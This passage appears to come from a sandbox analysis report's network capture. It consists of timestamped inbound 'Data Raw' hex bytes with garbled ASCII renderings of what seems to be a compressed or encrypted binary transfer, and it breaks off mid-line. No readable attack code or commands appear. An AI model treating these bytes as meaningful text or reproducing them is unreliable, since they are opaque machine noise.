52 4d 2e c3 71 e1 72 ad aa b4 38 bf d5 ce c4 65 23 65 9b 29 ce 7e cb 37 69 ce 75 17 a7 f1 Data Ascii: ^w!}3R F~}pv`kn)'(?]0(St8 H4^k.\|4Q%^)y5WQ<FZ=Aa(0il<H7?UW#4"L6v=61$HCeP:*9")z q%Rte=RM.qr8e#e)~7iu
2023-08-02 08:35:15 UTC	2353	IN	Data Raw: 10 a2 85 69 b1 e3 3d b8 28 b3 50 eb b7 d6 72 44 e3 df c2 05 7b 8c e5 bc de 05 2f 24 39 1c 6d 42 84 e0 5e 23 b4 b7 e3 30 7f dd 90 7f 4d 7b 4c 7f ed a9 3a 84 0c 81 29 5e 53 3f d9 a7 54 23 e9 e4 73 18 86 6c 3f 81 47 39 da ea 7b 0b e9 f7 ba e9 d2 b9 00 dd 6e b0 f0 f8 25 87 1b 08 f7 f4 c2 a9 19 2e 95 3d e7 6b 80 71 97 bb 70 c2 26 8a 82 40 19 f1 ed 3d 78 d1 8a 5c 6d ff cb 09 4b 10 2b e9 ce 0a 95 f0 a7 96 47 88 2f 36 e8 af 1a b3 9c f8 87 88 b8 5c 60 cb 19 b0 95 67 79 f9 d7 f7 5a 2a 85 9e 09 f0 69 7d 28 9b d3 bc 5c be 1c 01 c2 86 e1 98 88 ac bd 7b 62 c9 99 76 df 07 d7 6e de b1 62 d2 95 1f ad 3b 2e 04 c2 30 98 ba 93 09 79 76 14 e7 14 e4 c3 40 3d b7 fd 98 b1 3d e8 11 02 1f a2 d3 6e 0b 77 53 17 2e 2c 25 16 dc 12 27 2b af 14 9e a5 4d f9 ec a9 f9 02 c3 a7 d3 a5 d9 54 Data Ascii: i=(PrD{/$9mB^#0M{L:)^S?T#sl?G9{n%.=kqp&@=x\mK+G/6\`gyZ*i}(\{bvnb;.0yv@==nwS.,%'+MT
2023-08-02 08:35:15 UTC	2369	IN	Data Raw: b6 73 89 78 62 34 95 50 56 c6 51 56 1e 68 98 74 c0 1e 3a 40 a0 f8 0a 5a 7d db fa 79 ab 60 fb f1 c1 9e f6 ef 9b 00 ea 1b af 34 3c 65 fa f9 31 96 68 50 82 9c 23 41 3d 54 54 2b 9b 10 0c 6a be 98 71 4c 0f 44 d0 fd 20 86 28 ce 61 34 8b 1c b0 ba b2 e4 b9 09 27 68 43 55 90 3a c4 db 63 25 6b 93 2b 68 db d1 a2 36 16 8d 09 63 34 1c b2 21 30 e7 67 20 d8 a1 ff 0c ce de fe 4a 84 57 4c 0d 02 aa bb f1 51 e6 88 e9 5f 3f 27 04 b7 12 3f 37 49 2f 11 c4 2f 11 ad f5 cc 77 42 ed b9 11 43 db 64 00 3e 18 08 b5 6d 5f 1f 4f 71 cf 8b 12 00 8f 7c e4 48 3b 47 e4 07 3a 22 fb 0c 42 4e 9f 04 94 2c c7 85 b2 79 0c 5b 5c dd f8 63 cf 09 e4 e6 cf 96 97 c4 04 72 35 45 da d3 d0 31 ae 11 25 64 24 9e c6 02 c5 ec 82 6e 33 c0 71 ca f8 27 56 59 cd a4 2c 6d 32 1e 97 b2 74 ca 94 09 8e a3 4f 69 be 34 Data Ascii: sxb4PVQVht:@Z}y`4<e1hP#A=TT+jqLD (a4'hCU:c%k+h6c4!0g JWLQ_?'?7I//wBCd>m_Oq\|H;G:"BN,y[\cr5E1%d$n3q'VY,m2tOi4
2023-08-02 08:35:15 UTC	2385	IN	Data Raw: 92 4b 79 56 d8 50 91 85 58 3e ba b5 b1 90 4f af 1c 9a 99 fc 4b 07 ce bc 62 4a 6f c2 71 2e 2b ca c0 86 7c 9b 30 a8 2e 7a bd 2c 03 7e 27 9f a0 ca f4 4d 77 21 87 03 80 1a d2 24 76 b3 6c de f4 cb ec 17 a3 a3 7f 89 57 ae 58 f3 a8 a2 cc 2f ee de 64 50 41 05 96 40 f2 aa de 57 c2 62 07 d0 60 0e b3 3f ee 3f 96 7e f0 7f 9a 95 cb 58 d9 28 6b 17 1a 31 f0 27 f0 15 d3 70 fa e3 e0 39 e4 8e 69 c9 1d e7 49 45 4e 46 f6 8d a3 74 90 b2 23 d4 f0 16 b2 10 f1 13 f4 4a b2 1f 5e cd a3 f9 80 f6 ee 64 b6 f9 c0 33 f8 10 b8 a6 71 6a 37 9d 30 eb 37 f8 39 80 d1 cb 5a a2 4e 44 4f 12 28 8b cf 50 8d 6d b7 f8 85 57 1f c0 3a d3 99 a4 92 65 e3 c1 aa 9a f5 bb 9d 89 32 8d 19 ce 0a 07 55 4c 83 4c 98 c4 28 43 32 f9 28 6d ef 13 e8 b6 2d 99 3f c8 78 e8 79 45 36 10 bb fd 04 50 bb 4f 60 55 57 19 aa Data Ascii: KyVPX>OKbJoq.+\|0.z,~'Mw!$vlWX/dPA@Wb`??~X(k1'p9iIENFt#J^d3qj7079ZNDO(PmW:e2ULL(C2(m-?xyE6PO`UW
2023-08-02 08:35:15 UTC	2401	IN	Data Raw: 96 8c 94 04 67 df ed cd 94 15 08 74 26 ab b7 fa 5a 0c c6 e5 f4 53 37 d0 7e b3 49 c4 13 59 be 26 7b 66 c8 5e 60 02 d8 eb c0 c3 f4 dd 65 76 e1 d7 46 43 2b 13 f9 8b 22 f2 24 f7 9c f6 04 95 34 05 0d 7f d2 5e 04 73 48 54 9c 87 5f 17 16 c1 20 fd 49 08 98 ac 78 08 b1 bd 6e 0f 0a 17 89 ea 58 77 1b 04 a8 8c 2a 17 68 ab f5 64 1a e3 d9 cd bb d3 ae 77 05 11 b8 2d 96 04 42 bb 1d 5e 5a 36 fd a7 b3 d5 1e 47 85 33 c6 b5 3d 0a 7f 37 4e d8 24 b8 83 2a 5a 4d 54 69 24 11 ff f3 1e 4c a0 67 db 58 66 dd df 91 b4 b1 1a 3c c7 9b 77 74 ae ed cd 73 91 65 00 b6 72 25 e9 15 f2 c1 a6 05 ef 66 58 75 37 c4 28 24 a0 b6 3f 92 54 c6 6a f5 e9 15 64 bd f1 99 72 e4 1b 5a 51 4b 85 53 f8 c2 51 06 20 94 a0 7b 20 e1 22 34 b2 db 8a 88 d3 31 99 30 98 49 43 6f 56 38 79 d6 4a 98 73 f6 71 32 f1 fd b2 Data Ascii: gt&ZS7~IY&{f^`evFC+"$4^sHT_ IxnXwhdw-B^Z6G3=7N$ZMTi$LgXf<wtser%fXu7($?TjdrZQKSQ { "410ICoV8yJsq2
2023-08-02 08:35:15 UTC	2417	IN	Data Raw: 97 3a 93 62 a0 d0 05 5c c0 9a 78 ac 21 3c 1a e0 16 2b ee 8f f8 5c 2c 58 c6 21 b8 78 52 b7 dc 9b d8 a0 03 ac 2c df 4a 47 b6 73 dd 2d d6 c7 d7 ec 4b b7 ce fa ec ea 36 29 8f 40 e1 f8 d9 2b 1b 1e d3 33 c2 53 0e 3c 03 68 17 d3 b7 71 72 42 5e 21 4c 09 fb 4d c8 40 0f 22 ba 8a d6 99 b4 5e f7 21 5a 89 2b e6 10 2b fb a9 c0 c9 6e b7 48 91 1e 7a 92 89 4e 41 bd da 64 54 b1 1a 89 76 0b 6d cf ab 09 57 30 3a 4e 80 94 b2 c7 7f 8e aa 7d 85 ff cf 2f a5 81 cc b6 e8 36 2c db 33 6a 8b df f4 a8 d3 26 af bf a8 15 4e 12 0f 83 04 e1 30 99 b4 73 b6 3e fc 90 5a 3e c2 2e 9e 50 6d 94 97 18 cd e3 81 27 2f 24 ae 72 65 b9 19 4e 47 c2 d2 c9 f5 6b 64 eb b9 bb 86 7f f8 a5 a6 f5 36 78 c6 2a 81 fc 14 2e ca 2d c2 3e 06 99 a5 76 03 97 54 89 b7 be c4 e9 92 56 d1 f3 53 a2 3a df 31 eb dc 20 59 41 Data Ascii: :b\x!<+\,X!xR,JGs-K6)@+3S<hqrB^!LM@"^!Z++nHzNAdTvmW0:N}/6,3j&N0s>Z>.Pm'/$reNGkd6x*.->vTVS:1 YA
2023-08-02 08:35:15 UTC	2433	IN	Data Raw: 68 8c a8 f8 14 10 34 92 48 e0 d3 cf 11 a2 e1 dc fd 51 01 40 2c c0 d2 3f 52 d2 ea c6 c3 33 45 23 a1 b5 70 16 88 8a e0 28 e9 df de 0f 7a b3 c1 6d 97 2c d9 9b 73 46 8a 6d 5b e3 8a 10 5e 81 a0 cc ae 18 7e 58 b1 64 1f 31 68 d0 53 d0 5b f2 25 16 ef d6 52 e2 f0 d2 39 e2 d2 fe 28 4c 9c 0d 8d 52 62 b3 e1 c6 b0 1d b7 da 47 12 34 d1 40 03 f3 2e bd bb 28 6d 85 c5 ac ee 06 06 26 96 e5 ac 98 d2 23 e1 69 8c b4 e5 e3 01 da d8 70 15 ed 94 65 6f fc 52 0f 3f e2 c5 af c4 fc 65 92 3e a7 5e 9f b6 f5 59 69 24 f7 47 25 df 67 f6 f8 23 11 81 a8 28 34 65 df 4f b2 6b 08 ce 71 46 07 b8 d5 c4 93 48 54 58 2a 89 53 e7 15 8b 02 b6 15 0b 29 95 f9 72 64 7d 8f bb 4d 41 52 4e 6a 04 26 61 2a 87 60 b0 7c 8b 5b 8a de e7 6a b7 02 34 a3 89 9e c6 cf e5 82 6d 13 d5 be 90 dd 0d 33 76 83 51 b4 0c b0 Data Ascii: h4HQ@,?R3E#p(zm,sFm[^~Xd1hS[%R9(LRbG4@.(m&#ipeoR?e>^Yi$G%g#(4eOkqFHTXS)rd}MARNj&a`\|[j4m3vQ
2023-08-02 08:35:15 UTC	2449	IN	Data Raw: f5 86 32 cd cd ba a3 d8 29 48 da 17 01 7d 65 2a 93 79 2d 92 98 0d 0f 7a b4 f2 b1 4f cd 43 77 36 e1 bf 17 86 91 53 a7 f8 39 9a 40 78 7b 8a 33 67 08 f2 46 bb 10 1f 83 8b 34 dc 50 11 62 eb bf 9d 37 94 55 1b ec 83 c2 27 a4 f1 4a 2e 02 e4 8e 5d 1a 2a 50 1a de 01 d3 7e d2 b1 51 5e 3c c7 10 7d 9c ab 23 2b 86 c2 28 59 c0 99 5f b9 5a e1 11 43 5a df 73 ee d7 01 78 46 8e 38 87 85 57 b3 38 79 a8 57 c3 20 9a ff 6f ee a2 c5 d0 70 68 02 2d a2 44 54 29 c1 f0 13 ac 49 2a b0 68 bd cc ab 4e 18 35 25 42 3f 99 27 03 6a 28 93 a9 dd 08 0a be 6f f5 cc 79 98 a9 98 66 78 c6 60 b3 b6 65 ed fb 88 bd 00 15 7e 2b ba a5 4d 48 38 41 c9 2a 78 22 3b c1 2f 34 aa ef 9d 5e 51 98 fe 4c ad ce 88 2b bf bf 10 12 3e b7 55 ce 4c 9a 4b 74 94 7d c0 a7 85 76 ec 18 7f ec 5b 3d d6 fc 2a 2f 61 9f 33 b1 Data Ascii: 2)H}ey-zOCw6S9@x{3gF4Pb7U'J.]P~Q^<}#+(Y_ZCZsxF8W8yW oph-DT)IhN5%B?'j(oyfx`e~+MH8Ax";/4^QL+>ULKt}v[=*/a3
2023-08-02 08:35:15 UTC	2465	IN	Data Raw: d9 33 d8 8e 7d 8e 1b 4c 5e 75 de 55 8c 64 aa 49 15 53 21 d7 eb b8 8b 23 ef e8 45 46 4d 9f d8 0f 52 fe be 5a 15 eb bd 62 49 3b de 45 61 26 f9 67 52 76 f5 7a 78 58 b1 cd 22 ad 61 59 b6 51 8b 46 ee 0c ef cc 15 ed ac b2 1d a4 20 85 91 32 8c 6d cc b7 63 73 34 a3 a3 c1 e3 bd 2f 33 d4 22 15 2f b2 b9 1a 16 8e 1a 90 9a 12 d3 87 4d ac dd d8 85 44 78 45 75 59 40 ca dc 6d e4 88 cd 79 8d 6f 48 06 b0 88 69 38 99 b1 c8 81 da c9 4f 9c 59 8a df 8f 2a e7 0b 60 4f 72 c8 a6 93 68 0b 6e 01 a0 b3 bb 6c 7d 4e 17 b3 6f 9b 55 34 9b a0 3c 92 50 f5 78 fe bd a0 3d b7 b0 f0 9c fe a8 11 24 03 d2 c3 80 9e 9a 0d c5 06 40 c6 0b 5b c0 60 c5 4e 3b a7 98 f7 6e 3f ca 27 81 8f fc 82 5c 89 64 ff c0 81 8c 12 7c 7a 93 7e 68 04 49 1f 29 e3 9e dc c6 98 80 70 a0 c6 b0 ed 20 e4 9c a8 1b b0 3f 04 dc Data Ascii: 3}L^uUdIS!#EFMRZbI;Ea&gRvzxX"aYQF 2mcs4/3"/MDxEuY@myoHi8OY*`Orhnl}NoU4<Px=$@[`N;n?'\d\|z~hI)p ?
2023-08-02 08:35:15 UTC	2481	IN	Data Raw: 50 54 d5 39 eb e3 b2 b6 1d 95 f5 af da dc 19 25 ad aa b1 63 2d c0 7a 26 ab 3e f3 7c 7d 4e 3b 48 27 ee 26 04 ae 7b da 24 37 f4 fb ff 10 f7 f4 0f 62 9e 1f 97 6f 4a bd ed 44 f6 30 6d c2 c7 70 74 65 68 d6 df 21 52 df 58 ac 02 4f d7 94 fb ec 74 5b 9f ab 27 46 87 18 10 7e ce be de 7b a4 c5 0c d6 19 ee f7 00 25 ac d0 74 f1 06 2d 00 08 73 af c0 14 0c 65 f2 a4 3c c0 a5 db 10 f5 29 85 8b 24 f6 af c9 ca 6f cb 98 bd 99 4f 5c cd 3d 8a 60 01 6a d2 ef a5 7e 38 b2 52 56 5e 53 ff c8 b8 e3 75 fb cf 52 66 ee d3 ad 7d 95 49 a3 8e 4e 3e b1 4a 7e fe ad 7b 4b 8d 78 a1 13 4c e9 cf 12 3f 65 16 2b 54 41 a1 58 cf 2f 68 55 9c c6 96 4b be bf 60 10 5a bf ed 98 f2 34 eb 00 c6 72 f5 06 24 da f9 ea 81 5c 02 6d 0b a7 d6 35 3b f2 24 5a bf 8d 0c a0 d9 d3 36 07 09 26 66 9f bc 56 5f 00 7b a2 Data Ascii: PT9%c-z&>\|}N;H'&{$7boJD0mpteh!RXOt['F~{%t-se<)$oO\=`j~8RV^SuRf}IN>J~{KxL?e+TAX/hUK`Z4r$\m5;$Z6&fV_{
2023-08-02 08:35:15 UTC	2497	IN	Data Raw: 5f a4 2c 38 42 12 4d 13 a4 7d 1a 88 10 23 1b 13 c9 72 a5 93 a8 f5 f8 65 b2 f0 07 31 83 ba fa a5 60 73 94 fe 27 63 7a 78 ad 98 ea 0e 4c 14 1e 84 8c bf 90 de 1e 3c 50 5c 8b 71 cf 11 b0 47 a1 f8 5d 06 04 f8 fe bd 95 cd 00 86 1e 33 7a 7c 22 c3 26 20 38 2a be e7 e3 59 33 78 1c 8c b4 46 fc 08 e8 c2 ad e6 f6 2a ae 9c b2 65 ed 73 9b c5 3d 0e ba 09 18 8f 47 f0 ae eb a4 84 e9 88 69 e6 db bb f0 f7 93 55 43 b9 dc 0a 95 47 0f d5 d2 ca f8 60 67 ff 4d 97 0c ac 87 bf ee 43 79 37 50 7d 7b 60 13 7f be 9a f5 0e 96 48 f0 79 f8 07 de dd 74 e9 40 5b 6c 47 0f 5a 66 c3 e9 d0 02 a9 d6 5a 18 cf 95 ac 44 1d ed b9 16 a3 2e 54 56 e5 89 36 a3 c6 a9 9b 42 be 1b 17 ed 9d c3 80 21 3b 45 65 f4 9a 2a 02 03 00 b3 ff e4 24 de c8 e6 c8 49 72 77 0a 16 24 bb 90 ac dd 75 65 9d 1e a2 15 7d 9f 01 Data Ascii: _,8BM}#re1`s'czxL<P\qG]3z\|"& 8Y3xFes=GiUCG`gMCy7P}{`Hyt@[lGZfZD.TV6B!;Ee*$Irw$ue}
2023-08-02 08:35:15 UTC	2513	IN	Data Raw: 57 0e 14 43 3f 14 eb db 00 b6 54 cf 1b 55 b7 c5 86 a7 d7 3d 39 9b a7 0e 48 72 78 82 82 6b 46 9f 90 31 9c 80 2d 06 8b b9 de 54 bd ec bb 31 6b b4 5b 10 f5 f4 cf 9b 69 05 12 b4 26 df 87 4d 9f d8 1a 2b 69 da e3 13 70 e6 2f b9 d8 60 5b 66 b5 8a 8c 4d 44 e4 a3 af 16 06 bf ef 01 26 4b 70 66 76 a0 9b 01 b8 0e b8 af 17 7c f7 5f 92 f3 4a 5b 4a df 4f 09 f7 cf eb 1c f2 49 06 a7 51 a2 c4 e7 b1 9e b1 71 b9 47 b9 3e 53 18 21 10 40 15 c3 08 2a 7f 74 46 bb 1a f9 28 f6 ca c6 42 93 e6 47 fc 2f 64 a5 51 e0 b3 1d 25 ef 7d 9f e4 2b 87 1c 16 25 12 14 ba 58 d3 d4 e1 f2 96 4a 51 ff ee 62 05 02 26 04 7f 71 a4 64 ed b9 7f 8d 65 37 09 06 8f e7 71 32 a6 db c1 eb 3b a1 a6 4b de 15 97 c4 4a 21 90 49 8e dc c9 26 8e 6e b2 fb 6f f1 aa 17 be d9 4f ea d2 f6 fa 33 53 f9 e3 b8 c8 9f 87 c9 92 Data Ascii: WC?TU=9HrxkF1-T1k[i&M+ip/`[fMD&Kpfv\|_J[JOIQqG>S!@*tF(BG/dQ%}+%XJQb&qde7q2;KJ!I&noO3S
2023-08-02 08:35:15 UTC	2529	IN	Data Raw: e8 d7 a8 35 ae 34 e1 9c 90 3f 2d a0 51 b8 8a 80 42 c4 ce c7 45 cb 5c da 71 39 ae 81 86 64 35 b0 1c 70 95 f7 56 88 2c bd 74 f2 82 4f 05 eb 81 19 a0 96 74 1b bb 92 18 ef 6b 42 48 49 f9 39 03 0f 12 c4 8e 98 af 1d 1d 94 46 72 f5 03 e7 86 3a f0 15 70 d4 c9 5f 90 ac fa 22 35 8d 4a c8 3f e4 48 51 73 a6 f0 20 c2 76 2b 5c 9b 14 06 cc d6 89 c7 c7 0f b8 3e 24 29 0a b9 2e 2d e5 00 51 3c b7 ba fb 93 b7 85 c1 75 ef 93 ae bc 0d 0c b9 9b 91 0f e2 7b 64 08 33 9f bf 8e 97 d7 f7 14 1d a3 d2 c2 2f ad b0 97 e0 ff 14 3a 2c 60 09 a3 9b 5f aa 65 66 89 cb a4 b5 14 ae a4 e7 3c a5 d5 87 06 45 76 18 c1 df f9 ef 57 12 8a 1f cb f8 28 ed b4 05 32 d8 ab cc 87 79 e3 6d 82 ab eb e4 f7 6d 5a ea 63 23 6a c8 4e 18 14 78 69 82 c5 09 55 d1 36 61 9a 65 2a 54 60 3c 16 3a e3 ff d0 75 94 f0 61 c3 Data Ascii: 54?-QBE\q9d5pV,tOtkBHI9Fr:p_"5J?HQs v+\>$).-Q<u{d3/:,`_ef<EvW(2ymmZc#jNxiU6ae*T`<:ua
2023-08-02 08:35:15 UTC	2545	IN	Data Raw: 88 cb 93 af 4b bd cd 50 04 c7 33 70 b8 9d 45 01 fc 34 8b 5b 6a 38 17 2e cf 35 3d e9 77 28 8a cc 39 fd 9f 94 fa 15 09 92 e7 33 85 ae bd 62 eb 7e e5 4a 54 9d 8d 37 eb 33 9c bf ec 92 5f 28 f4 fa ad bf b3 c3 53 6f 16 83 2f 0a 05 2e 90 31 5b e9 1f b4 1f 36 66 c1 38 fb 4c 3d f4 1d 32 b5 ce 02 31 14 e4 ec 95 07 3a 2c 2f d9 d3 9c 27 5f 9e 9f ec 08 d3 0b da fd 4f 8d 31 5a 26 fa 7f 30 ca 0f 70 9c f1 f8 5b ea e6 23 73 19 fe 99 67 b9 04 c8 de e3 80 fd 3b 69 d3 39 cf a8 7c 3e 3f 16 99 90 3a f2 77 5e 52 e3 83 4c ff 75 be 68 e0 4e 39 fa 76 71 86 82 b9 69 30 d5 6a 63 68 8e 63 5a 08 68 2d bc 61 b3 f3 86 47 c3 d2 57 be da d2 20 39 6b 18 30 1f 0f 22 a2 3d c5 2c 38 05 71 84 76 e7 69 14 f7 bb 5c 5e 1c f2 10 4d 9a 2e 4e df 71 00 75 f2 dd 9a d8 18 e6 99 d5 d7 be df 7b 22 02 ff Data Ascii: KP3pE4[j8.5=w(93b~JT73_(So/.1[6f8L=21:,/'_O1Z&0p[#sg;i9\|>?:w^RLuhN9vqi0jchcZh-aGW 9k0"=,8qvi\^M.Nqu{"
2023-08-02 08:35:15 UTC	2561	IN	Data Raw: 64 02 bd 4b 1f 26 f3 00 53 15 f0 17 92 84 59 ee 80 95 1b 44 c4 9b 18 d7 ad 88 2f b5 23 86 d4 e6 4e da 55 ac f7 e9 00 e7 0a fc 53 f7 c6 0c c1 ca 6a 15 bd 0c 81 3d 54 91 e1 b7 9f ef 9b be 83 c4 94 d1 f5 75 62 6b a4 e9 d0 d8 01 5c ce 4c 87 41 a0 df e9 3e ed 61 b0 b2 37 cf 62 d1 db 21 db 25 18 69 c2 28 27 cb f3 69 07 6c a9 e4 19 c1 4e 0a a5 48 4c 51 fd 35 70 fa 31 fa 44 58 a2 30 a2 00 b7 fc cb dc 8f 71 81 bf a3 23 1e 9f 66 24 ec 0c 32 d3 97 61 6a d1 87 4c de e4 3d a5 f4 37 81 fe f5 fc ea 5e 87 f8 2a 61 0b fb f9 71 fc 56 fd 1e 6c 66 0e 96 62 c9 cb b5 93 96 c1 0c c1 9f 49 24 3d 12 49 65 25 0f 03 06 1c a3 78 f9 73 d5 c1 10 09 58 68 a9 3d 89 07 d4 ba 78 77 44 54 ae 01 cc e5 fc 4f 92 49 9b 4a 79 e0 6f 8a 5a d1 db a5 05 82 dc 29 9d b1 e1 26 52 ab 3d a6 dd 16 ef 77 Data Ascii: dK&SYD/#NUSj=Tubk\LA>a7b!%i('ilNHLQ5p1DX0q#f$2ajL=7^*aqVlfbI$=Ie%xsXh=xwDTOIJyoZ)&R=w
2023-08-02 08:35:15 UTC	2577	IN	Data Raw: 5a 4d f7 21 ed 14 79 b4 f5 7d 6f b6 8b ed 30 bc a1 d2 94 91 98 86 d9 45 0c 8e cb 6c fe d0 28 6f de fa 99 09 94 0d 79 f4 5a 42 d7 6f 01 37 39 63 29 54 c6 fc 96 6c a0 be ae cc 44 cf d6 d1 ba d7 e8 80 60 ff 73 78 6a b1 44 09 51 2e 47 9b b6 8d cd 19 9d aa 2c 33 3b b8 81 e0 76 5d 74 5f 56 64 ca 50 c9 1f e0 18 4b 2f ff 20 c0 7c f7 25 a4 48 f1 ce 64 ba 81 4b a2 10 9f e1 30 be b7 22 e8 b9 05 a1 e5 03 08 ef 42 5f c0 79 1d f0 57 37 fd de 51 60 bd b9 13 a1 f6 4c 53 ac 08 e0 a0 97 11 c3 c4 3f 5e 63 bb ef bc f5 df 4c e1 fb 30 e6 90 be f6 9f 7f 71 23 2c 28 70 13 c9 30 47 fd a4 d6 b3 98 15 7d f6 1d 2a 7f ca 41 e4 36 67 0f 89 b4 e4 ff 91 7e 63 d4 40 28 fa 0b 6a 57 20 8b 91 bc 2d 7b ee 25 3e 82 08 cc c4 3b 0b 87 81 5e 11 04 59 6d 9e e2 8c ac 4b fb 26 f8 17 f7 bd e9 a0 0d Data Ascii: ZM!y}o0El(oyZBo79c)TlD`sxjDQ.G,3;v]t_VdPK/ \|%HdK0"B_yW7Q`LS?^cL0q#,(p0G}*A6g~c@(jW -{%>;^YmK&
2023-08-02 08:35:15 UTC	2593	IN	Data Raw: 0f 31 bc d5 3a ac be de 14 f2 c0 23 3f 2c b4 a6 1b 81 73 58 bc 3f 37 90 4c 75 00 99 12 47 db e2 7e b8 63 d7 b6 21 ee 86 e5 df 18 ab b4 f1 8b 4d 0f c9 8c 47 d3 89 f6 cb 04 ff ee df 23 76 33 d6 16 66 88 f2 ed 29 bd ca 2b 61 4b c8 36 2e c9 37 18 b5 f9 8b ba d8 c1 bd 12 f0 3c 1f 22 df 89 56 b5 f6 b5 ad 02 ad 94 35 b1 89 f8 8c bf 11 7f e8 d6 5d d7 1f 86 4f 24 ec 77 a7 f2 de 50 19 77 ce ee e0 c6 76 11 23 f3 fa ca 88 30 36 92 e7 61 7a f3 5b 91 44 f0 5a 67 45 22 86 7b 4c bf 30 47 27 bf a3 db 48 23 61 bc 2c 34 83 75 e6 5c fe 64 37 39 3e 3e 72 a5 f0 76 da 8a c4 16 62 f6 de 5f f4 e7 c9 95 e1 d0 b7 38 69 74 ed 0d e5 ef 39 35 48 ba b0 81 cc d2 c1 87 f3 2d 9f ba 43 15 ea 7f 18 6f ac 3b 47 9d 2e 31 4a 32 98 2c a5 70 de ce c2 6c a3 8a 30 f7 80 08 73 74 22 c6 e0 61 de 45 Data Ascii: 1:#?,sX?7LuG~c!MG#v3f)+aK6.7<"V5]O$wPwv#06az[DZgE"{L0G'H#a,4u\d79>>rvb_8it95H-Co;G.1J2,pl0st"aE
2023-08-02 08:35:15 UTC	2609	IN	Data Raw: 40 df 00 6e 9e 7d 08 4b d0 d8 f2 ae d3 e3 15 48 c8 3b 53 89 d9 da 02 70 54 3e a3 a2 c0 e7 9b 54 a3 74 60 44 66 cc 79 a6 8b 90 ca bf ff 30 28 e0 13 2e 3f 2e 9b 53 5b b1 f1 8c e7 4c 3a 27 16 d3 cc b2 02 1a 31 00 df 35 74 e2 33 db 79 ad 86 64 78 e7 dc 47 ae 77 9d 50 fe df 81 54 ee c5 df 39 60 55 90 86 99 d0 c5 e8 39 6f a7 0d 49 7b e1 6a f2 00 b1 c1 37 69 13 56 37 81 a9 1d 38 24 87 d5 b1 44 bf 96 3d 56 f4 32 11 74 49 c8 af 3a bd 06 59 82 ef 2c fb 7d 6f de b9 17 9a c9 be 15 91 fc 14 2e b1 64 7d 9b 81 6a 8f 0c e7 50 d8 d3 b0 27 bd ee b3 78 3c 69 19 24 4b aa 16 e2 1c c5 d0 19 00 de 21 9d 62 d9 05 89 9a 7c bf 81 4b 64 1e 01 7b 85 e2 dc 39 92 ee 3b e9 7d 78 e5 e2 c2 40 bd fe ff df c4 76 bc 13 66 09 a4 fd 35 d2 9b 2e b8 4b cf 9f 2c cd 3c fa 53 90 b5 29 23 77 18 45 Data Ascii: @n}KH;SpT>Tt`Dfy0(.?.S[L:'15t3ydxGwPT9`U9oI{j7iV78$D=V2tI:Y,}o.d}jP'x<i$K!b\|Kd{9;}x@vf5.K,<S)#wE
2023-08-02 08:35:15 UTC	2625	IN	Data Raw: e9 06 e7 98 76 da f4 7d 8b 44 9b 1c 37 10 08 24 c6 63 29 58 f7 c5 91 ed ee 71 cd b6 85 fb a8 3b 9c fd c5 37 c4 52 dd 18 4e 71 87 a2 6a 0e 55 39 2f dc e2 e0 33 35 0c 62 c5 f9 40 c5 c9 3c 9d dc 91 d3 af b5 6c ca 71 db b7 a8 c4 13 17 b8 ef e3 86 de 8f 0f 59 1e 36 d2 e9 8f 62 ac f2 74 e3 65 27 02 f7 f0 54 ce cd 11 b5 95 e2 28 e8 e5 cb f4 5e 42 77 af bc bb a7 fc 41 6d 84 bc 10 9d b3 9b 53 51 3f c8 d3 94 3f 57 fa 58 8c 45 82 88 08 74 1f 81 82 c3 a2 f0 d7 4c 71 40 7b 7f fa 41 61 fc ac 01 75 94 4b 25 91 d7 ee 8f c1 0b e0 c5 d7 c3 da c2 9e c9 8a fd 93 7c 22 ea 28 11 b1 9a 80 88 18 f1 44 a2 f2 ad 71 10 10 04 00 05 00 33 53 36 33 00 00 5f 64 e8 d9 67 69 05 9d 3c b0 b7 89 2d ea b8 22 69 10 16 10 4a 02 5b 78 00 5d 20 e0 2c 77 e9 97 0e 25 60 cb b8 f2 cc e0 ef ce fa f7 Data Ascii: v}D7$c)Xq;7RNqjU9/35b@<lqY6bte'T(^BwAmSQ??WXEtLq@{AauK%\|"(Dq3S63_dgi<-"iJ[x] ,w%`
2023-08-02 08:35:15 UTC	2641	IN	Data Raw: be a2 53 61 80 91 02 65 61 06 78 29 c1 b2 e6 de 84 f8 6f 75 c9 b4 35 28 83 6a a5 72 49 a7 c5 b8 bb 29 24 76 d4 31 74 fc b3 ae 55 aa 87 da 42 f5 c3 03 ed 6e 89 ba e2 26 ce bb b1 b1 4c 2b 68 35 ac df 85 05 21 7f 2a ce 6a e6 c8 63 f8 5a c1 15 ce 0a a6 6c 46 6d 00 27 81 78 0a c1 70 29 63 61 b0 4a 19 18 6c 76 46 2b fe 2f 5d 85 68 b8 84 ed 12 07 77 27 ab 15 9e 12 ae 21 c6 a2 c2 95 60 bb 06 49 b2 3f da 42 50 dc b5 56 f7 18 27 1f 55 c6 bd 09 21 74 b1 a1 4b 40 c2 2d 80 92 11 75 12 28 df f4 5a 5b 8a 97 91 57 69 ce a1 9c ee 8f 93 10 6b e3 56 47 31 97 a4 ac ac cd 03 fa cd 06 21 b5 b0 12 24 e0 2f 9e 00 15 e5 d0 14 66 30 28 c7 e0 8d 25 52 c4 32 2b ed d7 80 f2 27 12 27 29 fd ff 6c 90 24 39 22 2c 56 8f 2b 75 e6 c0 2e ce 4a 36 0b 0b c1 45 a6 75 62 59 ed 19 4a ea 94 0b 10 Data Ascii: Saeax)ou5(jrI)$v1tUBn&L+h5!*jcZlFm'xp)caJlvF+/]hw'!`I?BPV'U!tK@-u(Z[WikVG1!$/f0(%R2+'')l$9",V+u.J6EubYJ
2023-08-02 08:35:15 UTC	2657	IN	Data Raw: f2 09 64 a1 40 05 18 1d 1c 03 b6 b0 4d c0 e3 b7 6d 0f ef 2f 93 55 00 42 92 a8 85 83 24 01 60 14 b8 56 82 61 00 44 80 92 02 61 7e 14 75 3a 04 c5 09 98 25 88 45 50 bf 17 0f 40 70 56 78 08 c7 20 25 10 40 29 00 b0 8c 91 2b 28 9c 6a 28 92 0d c9 4c 35 28 c9 8b b0 50 24 a8 57 a0 a0 29 72 71 c8 a2 e5 a2 1f 0a 42 71 52 55 83 41 52 0c 05 28 62 44 c2 35 45 13 52 e9 72 41 48 3b 3c 19 4e 27 45 48 4a 2a 75 8d 28 0c ec 3c be c0 ac e3 2c 78 eb 20 02 6d d6 d3 a5 0f f4 25 d1 74 15 09 52 2b a4 05 86 e0 2e 9a 12 ac d7 7a db ac 89 df 05 c9 42 09 04 c2 12 b0 87 a2 f4 1d c3 02 18 20 21 0a 54 a8 28 80 bd 50 89 f5 38 0c c8 30 42 1a c6 55 c0 06 8c 15 c4 05 31 ec 83 19 f1 8e 03 7d 04 d6 0b 29 